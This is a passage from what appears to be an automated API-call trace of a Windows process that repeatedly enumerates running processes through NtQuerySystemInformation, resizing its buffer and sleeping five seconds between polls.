[0233.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.716] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.925] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 